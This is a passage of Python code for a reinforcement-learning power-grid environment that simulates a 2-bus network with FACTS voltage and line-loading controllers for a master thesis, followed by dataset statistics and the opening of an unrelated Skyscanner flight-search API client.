loading_perc_meas - loading_perc_ref) / 100) - k_old # 100 To get percentage in pu
k_x_comp = k_delta + k_old
# Bypassing series device if impedance close to 0
if abs(k_x_comp) < 0.0001: # Helping with convergence
self.net.switch.closed[1] = True # ACTUAL network, not a copy
# Make sure output within rating of device
if k_x_comp > k_x_comp_max_ind:
k_x_comp = k_x_comp_max_ind
if k_x_comp < k_x_comp_max_cap:
k_x_comp = k_x_comp_max_cap
return k_x_comp
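    # Worked example (hypothetical operating point): with c = 15, k_x_comp_max_ind = 0.4 and
    # k_old = 0, a measured loading of 120 % against a 100 % reference gives
    # k_delta = 15 * 0.4 * (120 - 100) / 100 = 1.2, which is then clipped to the 0.4 limit.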
## UPDATE NEEDED:
## Function for transition from reference parameter to reactive power output of shunt device
def Shunt_q_comp(self, v_ref_pu, bus_index, q_old):
v_bus_pu = self.net.res_bus.vm_pu[bus_index]
k = 25 # Coefficient for transition, tuned to hit 1 pu with nominal IEEE
q_rated = 100 # Mvar
q_min = -q_rated
q_max = q_rated
q_delta = k * q_rated * (
v_bus_pu - v_ref_pu) - q_old # q_old might come in handy later with RL if able to take actions without
# independent change in environment
q_comp = q_delta + q_old
if q_comp > q_max:
q_comp = q_max
if q_comp < q_min:
q_comp = q_min
# print(q_comp)
return q_comp
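    # Worked example (hypothetical operating point): with k = 25, q_rated = 100 Mvar and
    # q_old = 0, a bus voltage of 0.98 pu against a 1.00 pu reference gives
    # q_delta = 25 * 100 * (0.98 - 1.00) = -50 Mvar, inside the +/-100 Mvar rating.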
#The class for the 2-bus test network used in the Master Thesis by Joakim Oldeen & Vishnu Sharma.
#The class also includes several methods used by different RL algorithms, such as taking an action, calculating the reward, retrieving states and more
class powerGrid_ieee2:
def __init__(self,method):
#print('in init. Here we lay down the grid structure and load some random state values based on IEEE dataset');
self.method=method;
if self.method in ('dqn','ddqn','td3'):
self.errorState=[-2, -1000, -90];
self.numberOfTimeStepsPerState=3
else:
self.errorState=[-2,-1000];
self.numberOfTimeStepsPerState=1
with open('Data/JanLoadEvery5mins.pkl', 'rb') as pickle_file:
self.loadProfile = pickle.load(pickle_file)
with open('Data/generatorValuesEvery5mins.pkl', 'rb') as pickle_file:
self.powerProfile = pickle.load(pickle_file)
with open('Data/trainIndices.pkl', 'rb') as pickle_file:
self.trainIndices = pickle.load(pickle_file)
with open('Data/testIndices.pkl', 'rb') as pickle_file:
self.testIndices = pickle.load(pickle_file)
        self.testIndices = [860,860,860]  # NOTE: overrides the loaded test indices with a fixed state (debug/repro setting)
self.actionSpace = {'v_ref_pu': [i*5 / 100 for i in range(18, 23)], 'lp_ref': [i * 15 for i in range(0, 11)]}
#self.deepActionSpace = {'v_ref_pu': [i/ 100 for i in range(90, 111)], 'lp_ref': [i * 5 for i in range(0, 31)]}
self.deepActionSpace = {'v_ref_pu': [i*2/100 for i in range(45, 56)], 'lp_ref': [i * 10 for i in range(0, 16)]}
self.k_old = 0;
self.q_old = 0;
## Basic ieee 4bus system to copy parts from
net_temp = pp.networks.case4gs();
# COPY PARAMETERS FROM TEMP NETWORK TO USE IN 2 BUS RADIAL SYSTEM.
# BUSES
b0_in_service = net_temp.bus.in_service[0]
b0_max_vm_pu = net_temp.bus.max_vm_pu[0]
b0_min_vm_pu = net_temp.bus.min_vm_pu[0]
b0_name = net_temp.bus.name[0]
b0_type = net_temp.bus.type[0]
b0_vn_kv = net_temp.bus.vn_kv[0]
b0_zone = net_temp.bus.zone[0]
b0_geodata = (3, 2)
b1_in_service = net_temp.bus.in_service[1]
b1_max_vm_pu = net_temp.bus.max_vm_pu[1]
b1_min_vm_pu = net_temp.bus.min_vm_pu[1]
b1_name = net_temp.bus.name[1]
b1_type = net_temp.bus.type[1]
b1_vn_kv = net_temp.bus.vn_kv[1]
b1_zone = net_temp.bus.zone[1]
b1_geodata = (4, 2)
# BUS ELEMENTS
load_bus = net_temp.load.bus[1]
load_in_service = net_temp.load.in_service[1]
load_p_mw = net_temp.load.p_mw[1]
load_q_mvar = net_temp.load.q_mvar[1]
load_scaling = net_temp.load.scaling[1]
extGrid_bus = net_temp.ext_grid.bus[0]
extGrid_in_service = net_temp.ext_grid.in_service[0]
extGrid_va_degree = net_temp.ext_grid.va_degree[0]
extGrid_vm_pu = net_temp.ext_grid.vm_pu[0]
extGrid_max_p_mw = net_temp.ext_grid.max_p_mw[0]
extGrid_min_p_mw = net_temp.ext_grid.min_p_mw[0]
extGrid_max_q_mvar = net_temp.ext_grid.max_q_mvar[0]
extGrid_min_q_mvar = net_temp.ext_grid.min_q_mvar[0]
# LINES
line0_scaling = 1
line0_c_nf_per_km = net_temp.line.c_nf_per_km[0]
line0_df = net_temp.line.df[0]
line0_from_bus = net_temp.line.from_bus[0]
line0_g_us_per_km = net_temp.line.g_us_per_km[0]
line0_in_service = net_temp.line.in_service[0]
line0_length_km = net_temp.line.length_km[0]
line0_max_i_ka = net_temp.line.max_i_ka[0]
line0_max_loading_percent = net_temp.line.max_loading_percent[0]
line0_parallel = net_temp.line.parallel[0]
line0_r_ohm_per_km = net_temp.line.r_ohm_per_km[0] * line0_scaling
line0_to_bus = net_temp.line.to_bus[0]
line0_type = net_temp.line.type[0]
line0_x_ohm_per_km = net_temp.line.x_ohm_per_km[0] * line0_scaling
line1_scaling = 1.2
line1_c_nf_per_km = line0_c_nf_per_km
line1_df = line0_df
line1_from_bus = line0_from_bus
line1_g_us_per_km = line0_g_us_per_km
line1_in_service = line0_in_service
line1_length_km = line0_length_km
line1_max_i_ka = line0_max_i_ka
line1_max_loading_percent = line0_max_loading_percent
line1_parallel = line0_parallel
line1_r_ohm_per_km = line0_r_ohm_per_km
line1_to_bus = line0_to_bus
line1_type = line0_type
line1_x_ohm_per_km = line0_x_ohm_per_km * line1_scaling # Assume that the lines are identical except for line reactance
## creating 2 bus system using nominal values from 4 bus system
self.net = pp.create_empty_network()
# Create buses
b0 = pp.create_bus(self.net, in_service=b0_in_service, max_vm_pu=b0_max_vm_pu, min_vm_pu=b0_min_vm_pu,
name=b0_name, type=b0_type, vn_kv=b0_vn_kv, zone=b0_zone, geodata=b0_geodata)
b1 = pp.create_bus(self.net, in_service=b1_in_service, max_vm_pu=b1_max_vm_pu, min_vm_pu=b1_min_vm_pu,
name=b1_name, type=b1_type, vn_kv=b1_vn_kv, zone=b1_zone, geodata=b1_geodata)
# Create bus elements
load = pp.create_load(self.net, bus=load_bus, in_service=load_in_service,
p_mw=load_p_mw, q_mvar=load_q_mvar, scaling=load_scaling)
extGrid = pp.create_ext_grid(self.net, bus=extGrid_bus, in_service=extGrid_in_service,
va_degree=extGrid_va_degree,
vm_pu=extGrid_vm_pu, max_p_mw=extGrid_max_p_mw, min_p_mw=extGrid_min_p_mw,
max_q_mvar=extGrid_max_q_mvar, min_q_mvar=extGrid_min_q_mvar)
# Create lines
l0 = pp.create_line_from_parameters(self.net, c_nf_per_km=line0_c_nf_per_km, df=line0_df, from_bus=line0_from_bus,
g_us_per_km=line0_g_us_per_km, in_service=line0_in_service,
length_km=line0_length_km,
max_i_ka=line0_max_i_ka, max_loading_percent=line0_max_loading_percent,
parallel=line0_parallel, r_ohm_per_km=line0_r_ohm_per_km,
to_bus=line0_to_bus,
type=line0_type, x_ohm_per_km=line0_x_ohm_per_km)
l1 = pp.create_line_from_parameters(self.net, c_nf_per_km=line1_c_nf_per_km, df=line1_df, from_bus=line1_from_bus,
g_us_per_km=line1_g_us_per_km, in_service=line1_in_service,
length_km=line1_length_km,
max_i_ka=line1_max_i_ka, max_loading_percent=line1_max_loading_percent,
parallel=line1_parallel, r_ohm_per_km=line1_r_ohm_per_km,
to_bus=line1_to_bus,
type=line1_type, x_ohm_per_km=line1_x_ohm_per_km)
####Shunt FACTS device (bus 1)
# MV bus
bus_SVC = pp.create_bus(self.net, name='MV SVCtrafo bus', vn_kv=69, type='n', geodata=(4.04, 1.98), zone=2,
max_vm_pu=1.1,
min_vm_pu=0.9)
# Trafo
trafoSVC = pp.create_transformer_from_parameters(self.net, hv_bus=1, lv_bus=2, in_service=True,
name='trafoSVC', sn_mva=110, vn_hv_kv=230, vn_lv_kv=69,
vk_percent=12, vkr_percent=0.26, pfe_kw=55, i0_percent=0.06,
shift_degree=0, tap_side='hv', tap_neutral=0, tap_min=-9,
tap_max=9,
tap_step_percent=1.5, tap_step_degree=0,
tap_phase_shifter=False)
        # Tap changer on the shunt device is usually not used in real-life implementations.
#trafo_control = ct.DiscreteTapControl(net=self.net, tid=0, vm_lower_pu=0.95, vm_upper_pu=1.05)
# Breaker between grid HV bus and trafo HV bus to connect buses
sw_SVC = pp.create_switch(self.net, bus=1, element=0, et='t', type='CB', closed=False)
# Shunt devices connected with MV bus
shuntDev = pp.create_shunt(self.net, bus_SVC, 2, in_service=True, name='Shunt Device', step=1)
####Series device (at line 1, in middle between bus 0 and 1)
# Add intermediate buses for bypass and series compensation impedance
bus_SC1 = pp.create_bus(self.net, name='SC bus 1', vn_kv=230, type='n', geodata=(3.48, 2.05),
zone=2, max_vm_pu=1.1, min_vm_pu=0.9)
bus_SC2 = pp.create_bus(self.net, name='SC bus 2', vn_kv=230, type='n', geodata=(3.52, 2.05),
zone=2, max_vm_pu=1.1, min_vm_pu=0.9)
sw_SC_bypass = pp.create_switch(self.net, bus=3, element=4, et='b', type='CB', closed=True)
imp_SC = pp.create_impedance(self.net, from_bus=3, to_bus=4, rft_pu=0.0000001272, xft_pu=-0.0636*0.4,
rtf_pu=0.0000001272, xtf_pu=-0.0636*0.4, sn_mva=250,
in_service=True) # Just some default values
        # Adjust original Line 3 to connect to the new buses instead.
self.net.line.at[1, ['length_km', 'to_bus', 'name']] = [0.5, 3, 'line1_SC']
self.nominalP=self.net.load.p_mw[0]
self.nominalQ=self.net.load.q_mvar[0]
## select a random state for the episode
#self.stateIndex = np.random.randint(len(self.loadProfile)-1-self.numberOfTimeStepsPerState, size=1)[0];
def setMode(self,mode):
if mode=='train':
self.source=self.trainIndices;
else:
self.source=self.testIndices;
self.stateIndex = self.getstartingIndex()
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=False);
print('Environment has been successfully initialized');
# Create SHUNT controllers
self.shuntControl = ShuntFACTS(net=self.net, busVoltageInd=1, convLim=0.0005)
self.seriesControl = SeriesFACTS(net=self.net, lineLPInd=1, convLim=0.0005, x_line_pu=self.X_pu(1))
except:
print('Some error occurred while creating environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
def getstartingIndex(self):
index = np.random.randint(len(self.source), size=1)[0];
if self.source[index] + self.numberOfTimeStepsPerState < len(self.loadProfile):
return self.source[index];
else:
return self.getstartingIndex()
# Power flow calculation, runControl = True gives shunt device trafo tap changer iterative control activated
def runEnv(self, runControl):
try:
pp.runpp(self.net, run_control=runControl);
#print('Environment has been successfully initialized');
except:
#print(self.net.load.p_mw[0],self.net.load.q_mvar[0]);
#print(self.stateIndex)
#print(len(self.powerProfile))
if runControl:
print('Some error occurred while running environment after load increment in runEnv Function in DQN');
else:
print('Some error occurred while running environment after reset in runEnv Function in DQN');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
    ## Retrieve voltage and line loading percent as measurements of the current state
def getCurrentState(self):
bus_index_shunt = 1
line_index = 1;
return [self.net.res_bus.vm_pu[bus_index_shunt], self.net.res_line.loading_percent[line_index]];
def getCurrentStateForDQN(self):
bus_index_shunt = 1
line_index = 1;
return [self.net.res_bus.vm_pu[bus_index_shunt], self.net.res_line.loading_percent[line_index]/150, self.net.res_bus.va_degree[bus_index_shunt]/30];
# Return mean line loading in system. Emulation of what system operator would have set loading reference to.
def lp_ref_operator(self):
return stat.mean(self.net.res_line.loading_percent)
    ## Apply the chosen FACTS set-points (action selection, e.g. epsilon-greedy, happens in the agent)
    ## Return next state measurements, reward, done (boolean)
def takeAction(self, lp_ref, v_ref_pu):
# print('taking action')
stateAfterAction = copy.deepcopy(self.errorState);
stateAfterEnvChange = copy.deepcopy(self.errorState);
measAfterAction = [-2, -1000, -1000]
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = False
if lp_ref != 'na' and v_ref_pu != 'na':
self.shuntControl.ref = v_ref_pu;
self.seriesControl.ref = lp_ref;
networkFailure = False
done = False;
bus_index_shunt = 1;
line_index = 1;
if self.stateIndex < min(len(self.powerProfile), len(self.loadProfile)):
try:
dummyRes = (self.net.res_bus.vm_pu, self.net.res_line.loading_percent)
## state = (voltage,ll,angle,p,q)
pp.runpp(self.net, run_control=True);
if self.method in ('dqn', 'ddqn','td3'):
reward1 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent,
self.net.res_bus.va_degree[bus_index_shunt]);
stateAfterAction = self.getCurrentStateForDQN()
else:
reward1 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
stateAfterAction = self.getCurrentState()
#print('rew1: ', reward1)
measAfterAction = [self.net.res_bus.vm_pu[1], max(self.net.res_line.loading_percent), np.std(self.net.res_line.loading_percent)]
done = self.stateIndex == (len(self.powerProfile) - 1)
if done == False:
self.incrementLoadProfile()
if self.method in ('dqn', 'ddqn','td3'):
reward2 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent,
self.net.res_bus.va_degree[bus_index_shunt]);
stateAfterEnvChange = self.getCurrentStateForDQN()
else:
reward2 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
stateAfterEnvChange = self.getCurrentState()
#print('rew2: ',reward2)
reward = 0.7 * reward1 + 0.3 * reward2;
except:
print('Unstable environment settings in takeAction(). Action: ', (lp_ref, v_ref_pu), 'p_mw: ', self.net.load.p_mw[0]);
print('shunt, series, series switch: ', self.net.shunt.q_mvar[0], self.net.impedance.loc[0, ['xft_pu']], self.net.switch.closed[1])
#print(stateAfterEnvChange)
#print(stateAfterAction)
#print(lp_ref,v_ref_pu)
# print(dummyRes)
#print(self.net.load.p_mw[0],self.net.load.q_mvar[0]);
networkFailure = True;
reward = 0;
# return stateAfterAction, reward, networkFailure,stateAfterEnvChange ;
else:
print('Error: state index is outside the range of the load/power profiles')
stateAfterEnvChange.extend(stateAfterAction)
# print(self.errorState)
# print(reward2)
#print('totrew: ', reward)
return stateAfterEnvChange, reward, done or networkFailure, measAfterAction;
## Same as Take Action but without Try for debugging
def takeAction_noTry(self, lp_ref, v_ref_pu):
# print('taking action')
stateAfterAction = copy.deepcopy(self.errorState);
stateAfterEnvChange = copy.deepcopy(self.errorState);
measAfterAction = [-2, -1000, -1000]
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = False
if lp_ref != 'na' and v_ref_pu != 'na':
self.shuntControl.ref = v_ref_pu;
self.seriesControl.ref = lp_ref;
networkFailure = False
done = False;
bus_index_shunt = 1;
line_index = 1;
if self.stateIndex < min(len(self.powerProfile), len(self.loadProfile)):
dummyRes = (self.net.res_bus.vm_pu, self.net.res_line.loading_percent)
## state = (voltage,ll,angle,p,q)
pp.runpp(self.net, run_control=True);
if self.method in ('dqn', 'ddqn', 'td3'):
reward1 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent,
self.net.res_bus.va_degree[bus_index_shunt]);
stateAfterAction = self.getCurrentStateForDQN()
else:
reward1 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
stateAfterAction = self.getCurrentState()
# print('rew1: ', reward1)
measAfterAction = [self.net.res_bus.vm_pu[1], max(self.net.res_line.loading_percent),
np.std(self.net.res_line.loading_percent)]
done = self.stateIndex == (len(self.powerProfile) - 1)
if done == False:
self.incrementLoadProfile()
if self.method in ('dqn', 'ddqn', 'td3'):
reward2 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent,
self.net.res_bus.va_degree[bus_index_shunt]);
stateAfterEnvChange = self.getCurrentStateForDQN()
else:
reward2 = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
stateAfterEnvChange = self.getCurrentState()
# print('rew2: ',reward2)
reward = 0.7 * reward1 + 0.3 * reward2;
else:
print('Error: state index is outside the range of the load/power profiles')
stateAfterEnvChange.extend(stateAfterAction)
# print(self.errorState)
# print(reward2)
# print('totrew: ', reward)
return stateAfterEnvChange, reward, done or networkFailure, measAfterAction;
def incrementLoadProfile(self):
self.stateIndex += 1;
self.scaleLoadAndPowerValue(self.stateIndex);
self.runEnv(True);
"""
try:
pp.runpp(self.net);
reward = self.calculateReward(self.net.res_bus.vm_pu, self.net.res_line.loading_percent);
except:
networkFailure=True;
self.net.shunt.q_mvar=shuntBackup;
self.net.impedance.loc[0, ['xft_pu', 'xtf_pu']]=impedenceBackup;
pp.runpp(self.net);
reward=1000;
return self.net.res_bus,reward,True;
self.stateIndex += 1;
if self.stateIndex < len(self.powerProfile):
if (self.scaleLoadAndPowerValue(self.stateIndex, self.stateIndex - 1) == False):
networkFailure = True;
reward = 1000;
# self.stateIndex -= 1;
return self.net.res_bus, reward, self.stateIndex == len(self.powerProfile) or networkFailure;
"""
## Function to calculate line reactance in pu
def X_pu(self, line_index):
s_base = 100e6
v_base = 230e3
x_base = pow(v_base, 2) / s_base
x_line_ohm = self.net.line.x_ohm_per_km[line_index]
x_line_pu = x_line_ohm / x_base # The per-km value suffices, since the
# original line was divided into 2 identical lines of 0.5 km each
#print(x_line_pu)
return x_line_pu
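# Worked example (illustrative numbers): with s_base = 100 MVA and
# v_base = 230 kV, x_base = (230e3)**2 / 100e6 = 529 ohm, so a line with
# x_ohm_per_km = 52.9 ohm/km yields x_line_pu = 0.1.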
## Resets the environment by choosing a new starting state; used at the beginning of each episode
def reset(self):
self.stateIndex = self.getstartingIndex()
#Disable FACTS
self.net.switch.at[0, 'closed'] = False
self.net.switch.at[1, 'closed'] = True
# Make sure FACTS output is reset for controllers to work properly
#print(self.net.shunt.q_mvar[0])
#self.net.shunt.q_mvar[0] = 0
#print(self.net.impedance.loc[0, ['xft_pu']])
#self.net.impedance.loc[0, ['xft_pu', 'xtf_pu']] =
#self.net.shunt.q_mvar
self.scaleLoadAndPowerValue(self.stateIndex);
try:
pp.runpp(self.net, run_control=False);
except:
print('Some error occurred while resetting the environment');
raise Exception('cannot proceed at these settings. Please fix the environment settings');
## Calculate immediate reward
def calculateReward(self, voltages, loadingPercent,loadAngle=10):
try:
rew=0;
for i in range(1,2): # only bus 1, the FACTS-controlled bus, is evaluated
if voltages[i] > 1:
rew=voltages[i]-1;
else:
rew=1-voltages[i];
rewtemp = rew # keep the raw voltage deviation for the hard cutoff below
rew = math.exp(rew*10)*-20;
#print(rew)
loadingPercentInstability=np.std(loadingPercent) # scaling by len(loadingPercent) was tried; it works better without it
rew = rew - loadingPercentInstability;
# (math.exp(abs(1-voltages[i])*10)*-20)-std ;
#print(rew)
#rew=rew if abs(loadAngle)<30 else rew-200;
except:
print('exception in calculate reward')
print(voltages);
print(loadingPercent)
return 0;
rew = (200+rew)/200 # normalise to the 0-1 range
if rewtemp > 0.15 or abs(loadAngle)>=30: # a voltage deviation above 0.15 pu (or a large load angle) is penalised hard
rew = 0.001 # also ensures the final reward is >= 0
if rew < 0:
rew = 0
return rew
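# Illustrative reward values (sketch): a 0.01 pu deviation gives
# exp(0.1)*-20 ~ -22.1, i.e. ~0.89 after normalisation (ignoring the
# loading-spread penalty), while a deviation above 0.15 pu triggers the
# hard cutoff and returns 0.001.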
## Simple plot diagram
def plotGridFlow(self):
print('plotting powerflow for the current state')
plot.simple_plot(self.net)
## Scale load and generation from load and generation profiles
def scaleLoadAndPowerValue(self,index):
scalingFactorLoad = self.loadProfile[index] / (sum(self.loadProfile)/len(self.loadProfile));
scalingFactorPower = self.powerProfile[index] / max(self.powerProfile);
self.net.load.at[0, 'p_mw'] = self.nominalP * scalingFactorLoad;
self.net.load.at[0, 'q_mvar'] = self.nominalQ * scalingFactorLoad;
#self.net.sgen.p_mw = self.net.sgen.p_mw * scalingFactorPower;
#self.net.sgen.q_mvar = self.net.sgen.q_mvar * scalingFactorPower;
def runNoFACTS(self, busVoltageInd):
# Bypass FACTS devices if wanted
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = False
self.net.controller.in_service[0] = True
self.net.controller.in_service[1] = True
self.shuntControl.ref = 1
self.seriesControl.ref = 50
# Create array
v_arr = []
l_arr = []
# Loop through all loadings
for i in range(0, 600): #len(self.loadProfile)
# Increment and run environment
self.stateIndex += 1;
self.scaleLoadAndPowerValue(self.stateIndex);
self.runEnv(True);
# Store result for current settings
v_arr.append(self.net.res_bus.vm_pu[busVoltageInd])
l_arr.append(self.stateIndex)
# Plot result
print(max(v_arr))
print(min(v_arr))
plt.plot(l_arr, v_arr)
plt.grid()
plt.xlabel('Time step on load profile [-]', fontsize= 18 )
plt.ylabel('Voltage [pu]', fontsize= 18)
plt.title('Bus 2 Voltage with shunt+series FACTS ', fontsize= 22)
plt.show()
def runNoRL(self, busVoltageInd):
# Print the load profile:
# loadProfilesScaled = self.loadProfile / (sum(self.loadProfile) / len(self.loadProfile))
# P = loadProfilesScaled * self.nominalP
# Q = loadProfilesScaled * self.nominalQ
# xaxis = range(0, len(self.loadProfile))
# fig, ax1 = plt.subplots()
# ax1.set_title('Load profile', fontsize=24)
# ax1.set_xlabel('Time step on load profile [-]', fontsize=20)
# ax1.set_ylabel('Active power [MW] ', color='r', fontsize=20)
# ax1.plot(xaxis, P, color='r')
# ax1.set_ylim(0, 500)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# ax2 = ax1.twinx()
# ax2.set_ylabel('Reactive power [Mvar] ', color='tab:blue', fontsize=20)
# ax2.plot(xaxis, Q, color='tab:blue')
# ax2.set_ylim(0,500)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# plt.grid()
# plt.show()
#
# #Zoomed in version:
# fig, ax1 = plt.subplots()
# ending = 1000-1
# ax1.set_title('Load profile', fontsize=24)
# ax1.set_xlabel('Time step on load profile [-]', fontsize=20)
# ax1.set_ylabel('Active power [MW] ', color='r', fontsize=20)
# ax1.plot(xaxis[0:ending], P[0:ending], color='r')
# ax1.set_ylim(0,500)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# ax2 = ax1.twinx()
# ax2.set_ylabel('Reactive power [Mvar] ', color='tab:blue', fontsize=20)
# ax2.plot(xaxis[0:ending], Q[0:ending], color='tab:blue')
# ax2.set_ylim(0,500)
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# plt.grid()
# plt.show()
#SHUNT+SERIES:
# Bypass FACTS devices if wanted
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = True
self.net.controller.in_service[0] = True
self.net.controller.in_service[1] = False
self.shuntControl.ref = 1
self.seriesControl.ref = 50
# Create array
v_arr = []
v_arr_so = []
l_arr = []
# Loop through all loadings
for i in range(0, 600): # len(self.loadProfile)
# Increment and run environment
self.stateIndex += 1;
self.scaleLoadAndPowerValue(self.stateIndex);
self.runEnv(True);
# Store result for current settings
v_arr_so.append(self.net.res_bus.vm_pu[busVoltageInd])
l_arr.append(self.stateIndex)
#SHUNT ONLY
self.setMode('test')
self.net.switch.at[0, 'closed'] = True
self.net.switch.at[1, 'closed'] = False
self.net.controller.in_service[0] = True
self.net.controller.in_service[1] = True
for i in range(0, 600): # len(self.loadProfile)
# Increment and run environment
self.stateIndex += 1;
self.scaleLoadAndPowerValue(self.stateIndex);
self.runEnv(True);
# Store result for current settings
v_arr.append(self.net.res_bus.vm_pu[busVoltageInd])
# Plot result
print(max(v_arr))
print(min(v_arr))
print(max(v_arr_so))
print(min(v_arr_so))
plt.plot(l_arr, v_arr)
plt.plot(l_arr, v_arr_so)
plt.grid()
plt.xlabel('Time step on load profile [-]', fontsize=20)
plt.ylabel('Voltage [pu]', fontsize=20)
plt.title('Bus 2 Voltage with non-RL FACTS ', fontsize=24)
plt.legend(['shunt+series','shunt only'], fontsize=12)
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.show()
## Load profile data has been pickled already; do not run this function again for now
def createLoadProfile():
ML = (np.cos(2 * np.pi/12 * np.linspace(0,11,12)) * 50 + 100 ) * 1000 # monthly load
ML = el.make_timeseries(ML) #convenience wrapper around pd.DataFrame with pd.DateTimeindex
#print(ML)
DWL = el.gen_daily_stoch_el() #daily load working
DNWL = el.gen_daily_stoch_el() #daily load non working
#print(sum(DNWL))
Weight = .60 # fraction of energy assigned to working days (here a 60/40 working/non-working split)
Load1 = el.gen_load_from_daily_monthly(ML, DWL, DNWL, Weight)
Load1.name = 'L1'
Load1=Load1.round();
#print(Load1)
disag_profile = np.random.rand(60)
JanLoadEveryMinute=el.generate.disag_upsample(Load1[0:744],disag_profile, to_offset='min');
JanLoadEvery5mins=[];
l=0;
for i in range(0,JanLoadEveryMinute.shape[0]):
l=l+JanLoadEveryMinute[i];
if np.mod(i+1,5) == 0:
JanLoadEvery5mins.append(l);
l=0;
windDataDF = pd.read_excel('Data/WindEnergyData.xlsx');
generatorValuesEvery5mins=[];
for i in range(1,windDataDF.shape[0]):
randomValue=np.random.choice(100, 1)[0]
randomValue_prob = np.random.random();
if randomValue > windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'] or randomValue_prob < 0.4:
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'])
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'])
else :
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'] - randomValue)
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'] + randomValue)
generatorValuesEvery5mins.append(windDataDF.iloc[i]['DE_50hertz_wind_generation_actual'])
print(len(generatorValuesEvery5mins))
print(len(JanLoadEvery5mins))
pickle.dump(generatorValuesEvery5mins, open("Data/generatorValuesEvery5mins.pkl", "wb"))
pickle.dump(JanLoadEvery5mins, open("Data/JanLoadEvery5mins.pkl", "wb"))
def trainTestSplit():
with open('Data/JanLoadEvery5mins.pkl', 'rb') as pickle_file:
loadProfile = pickle.load(pickle_file)
numOFTrainingIndices = int(np.round(0.8*len(loadProfile)))
trainIndices=np.random.choice(range(0,len(loadProfile)),numOFTrainingIndices,replace=False)
trainIndicesSet=set(trainIndices)
testIndices=[x for x in range(0,len(loadProfile)) if x not in trainIndicesSet]
pickle.dump(trainIndices, open("Data/trainIndices.pkl", "wb"))
pickle.dump(testIndices, open("Data/testIndices.pkl", "wb"))
#print(len(loadProfile))
#print(len(trainIndicesSet))
#print(len(trainIndices))
#print(len(testIndices))
#createLoadProfile()
#trainTestSplit()
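# Hedged usage sketch (illustrative; 'env' stands for an instance of this
# environment class):
#   env.setMode('train')
#   env.reset()
#   state, reward, done, meas = env.takeAction(lp_ref=50, v_ref_pu=1.0)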
| 48.436883
| 173
| 0.604496
| 5,862
| 44,126
| 4.348686
| 0.112078
| 0.046956
| 0.021183
| 0.015809
| 0.666209
| 0.609172
| 0.575004
| 0.547309
| 0.524361
| 0.491605
| 0
| 0.033267
| 0.290169
| 44,126
| 910
| 174
| 48.49011
| 0.780601
| 0.183135
| 0
| 0.477833
| 0
| 0
| 0.078518
| 0.01599
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050903
| false
| 0.003284
| 0.022989
| 0.003284
| 0.106732
| 0.054187
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e66f7324f463b84e3db235287a63c2e184564ad
| 10,104
|
py
|
Python
|
python_flights/client.py
|
sylvaus/python_flights
|
613f1ad294ecb53a54af1fa3ca78fa83b0badc30
|
[
"MIT"
] | 1
|
2020-01-12T18:55:45.000Z
|
2020-01-12T18:55:45.000Z
|
python_flights/client.py
|
sylvaus/python_flights
|
613f1ad294ecb53a54af1fa3ca78fa83b0badc30
|
[
"MIT"
] | null | null | null |
python_flights/client.py
|
sylvaus/python_flights
|
613f1ad294ecb53a54af1fa3ca78fa83b0badc30
|
[
"MIT"
] | null | null | null |
import logging
import time
from datetime import datetime, timedelta
from itertools import product
from typing import List
import requests
from python_flights.itinerary import Itinerary
from python_flights.pods import Country, Currency, Airport, Place, Agent, Carrier, Direction, Trip, Segment, Price, \
CabinClass, SortType, SortOrder
PARAM_DATE_FORMATTING = "%Y-%m-%d"
JSON_DATE_FORMATTING = "%Y-%m-%dT%H:%M:%S"
API_ADDRESS = "https://skyscanner-skyscanner-flight-search-v1.p.rapidapi.com/apiservices"
LOCALES = [
'de-DE', 'el-GR', 'en-GB', 'en-US', 'es-ES', 'es-MX', 'et-EE', 'fi-FI', 'fr-FR', 'hr-HR', 'hu-HU', 'id-ID', 'it-IT',
'ja-JP', 'ko-KR', 'lt-LT', 'lv-LV', 'ms-MY', 'nb-NO', 'nl-NL', 'pl-PL', 'pt-BR', 'pt-PT', 'ro-RO', 'ru-RU', 'sk-SK',
'sv-SE', 'th-TH', 'tr-TR', 'uk-UA', 'vi-VN', 'zh-CN', 'zh-HK', 'zh-SG', 'zh-TW'
]
class FlightBrowser:
def __init__(self, api_key: str, locale="en-US", country="CA", currency="CAD"):
self._get_headers = {
'x-rapidapi-host': "skyscanner-skyscanner-flight-search-v1.p.rapidapi.com",
'x-rapidapi-key': f"{api_key}"
}
self._post_headers = {
'x-rapidapi-host': "skyscanner-skyscanner-flight-search-v1.p.rapidapi.com",
'x-rapidapi-key': f"{api_key}",
'content-type': "application/x-www-form-urlencoded"
}
self._locale = locale
self._country = country
self._currency = currency
self._currencies = None
